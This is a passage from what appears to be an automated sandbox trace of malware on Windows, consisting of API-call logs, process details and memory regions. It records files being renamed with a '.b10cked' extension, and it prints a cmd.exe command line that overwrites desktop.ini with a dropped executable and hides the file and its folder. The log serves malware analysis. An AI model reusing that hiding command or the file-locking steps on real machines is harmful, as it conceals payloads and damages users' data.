(_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0205.553] _wcsnicmp (_String1="COPYCMD", 
_String2="windir=", _MaxCount=0x7) returned -20 [0205.553] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0205.554] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0205.554] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0205.554] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm")) returned 0x20 [0205.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x401e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.554] SetErrorMode (uMode=0x0) returned 0x0 [0205.554] SetErrorMode (uMode=0x1) returned 0x0 [0205.554] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x24ec54, lpFilePart=0x24ec3c | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", lpFilePart=0x24ec3c*="state.rsm") returned 0x2d [0205.554] SetErrorMode (uMode=0x0) returned 0x1 [0205.554] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1")) returned 0x10 [0205.554] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0205.554] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0205.554] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm")) returned 0x20 [0205.554] SetErrorMode (uMode=0x0) returned 0x0 [0205.554] SetErrorMode (uMode=0x1) returned 0x0 [0205.555] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x24f0d0, lpFilePart=0x24ee68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", lpFilePart=0x24ee68*="state.rsm") returned 0x2d [0205.555] SetErrorMode (uMode=0x0) returned 0x1 [0205.555] SetErrorMode (uMode=0x0) returned 0x0 [0205.555] SetErrorMode (uMode=0x1) returned 0x0 
[0205.555] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x24f2d8, lpFilePart=0x24ee68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked", lpFilePart=0x24ee68*="state.rsm.b10cked") returned 0x35 [0205.555] SetErrorMode (uMode=0x0) returned 0x1 [0205.555] SetLastError (dwErrCode=0x0) [0205.555] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm.b10cked")) returned 0xffffffff [0205.555] GetLastError () returned 0x2 [0205.555] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x24e7e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e7e4) returned 0x3f0e88 [0205.555] FindNextFileW (in: hFindFile=0x3f0e88, lpFindFileData=0x24e7e4 | out: lpFindFileData=0x24e7e4) returned 0 [0205.556] GetLastError () returned 0x12 [0205.556] FindClose (in: hFindFile=0x3f0e88 | out: hFindFile=0x3f0e88) returned 1 [0205.557] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x401bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x401bf0) returned 0x3f0e88 [0205.557] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x24ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked", lpFilePart=0x0) returned 0x35 [0205.557] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x24ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", lpFilePart=0x0) returned 0x2d [0205.557] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm" (normalized: 
"c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm")) returned 0x20 [0205.557] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm"), lpNewFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm.b10cked"), dwFlags=0x3) returned 1 [0205.557] FindClose (in: hFindFile=0x3f0e88 | out: hFindFile=0x3f0e88) returned 1 [0205.558] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ea30 | out: _Buffer=" 1") returned 9 [0205.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.558] GetFileType (hFile=0x7) returned 0x2 [0205.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0205.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24e9bc | out: lpMode=0x24e9bc) returned 1 [0205.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.558] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24e9f0 | out: lpConsoleScreenBufferInfo=0x24e9f0) returned 1 [0205.558] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0205.559] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ea30 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0205.559] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ea14, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ea14*=0x1a) returned 1 [0205.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.559] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.559] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: 
lpMode=0x4a9e41ac) returned 1 [0205.559] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.559] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.559] SetConsoleInputExeNameW () returned 0x1 [0205.559] GetConsoleOutputCP () returned 0x1b5 [0205.559] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.559] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.560] exit (_Code=0) Process: id = "494" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x4d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30306 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30307 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 30308 start_va = 0x130000 end_va = 0x133fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 30309 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30310 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30311 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30312 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30313 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30314 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 30315 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30389 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30390 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30391 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30392 start_va = 0x2b0000 end_va = 0x3affff 
entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 30393 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 30394 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30395 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30396 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30397 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30398 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30399 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30400 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30401 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30402 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30403 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30404 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30405 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30406 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 30407 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 30408 start_va = 0x3b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 30409 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 30410 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 30411 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 30412 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 30413 start_va = 0x12f0000 end_va = 0x15befff entry_point = 
0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 692 os_tid = 0xd68 [0205.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f9c4 | out: lpSystemTimeAsFileTime=0x12f9c4*(dwLowDateTime=0xaf510440, dwHighDateTime=0x1d440a9)) [0205.531] GetCurrentProcessId () returned 0x4d4 [0205.531] GetCurrentThreadId () returned 0xd68 [0205.531] GetTickCount () returned 0x39e31 [0205.531] QueryPerformanceCounter (in: lpPerformanceCount=0x12f9bc | out: lpPerformanceCount=0x12f9bc*=26231981833) returned 1 [0205.531] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0205.531] __set_app_type (_Type=0x1) [0205.531] __p__fmode () returned 0x76b331f4 [0205.531] __p__commode () returned 0x76b331fc [0205.531] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0205.532] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0205.532] GetCurrentThreadId () returned 0xd68 [0205.532] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd68) returned 0x38 [0205.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.532] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0205.532] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.532] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f954 | out: phkResult=0x12f954*=0x0) returned 0x2 [0205.532] VirtualQuery (in: lpAddress=0x12f98b, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x12f000, 
AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.532] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0205.532] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0205.532] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.532] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0205.532] GetConsoleOutputCP () returned 0x1b5 [0205.532] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.532] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0205.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0205.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.533] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.533] 
SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0205.533] GetEnvironmentStringsW () returned 0x2c04b0* [0205.534] FreeEnvironmentStringsW (penv=0x2c04b0) returned 1 [0205.534] GetEnvironmentStringsW () returned 0x2c04b0* [0205.534] FreeEnvironmentStringsW (penv=0x2c04b0) returned 1 [0205.534] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e8c4 | out: phkResult=0x12e8c4*=0x40) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x60, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x1, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x1, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x0, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x40, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x40, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x40, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegCloseKey (hKey=0x40) returned 0x0 [0205.534] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e8c4 | out: phkResult=0x12e8c4*=0x40) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x40, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x1, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x1, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x0, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x9, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x9, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.535] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, 
lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x9, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.535] RegCloseKey (hKey=0x40) returned 0x0 [0205.535] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a7 [0205.535] srand (_Seed=0x5b8863a7) [0205.535] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"" [0205.535] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"" [0205.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.535] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c1c10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0205.535] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, 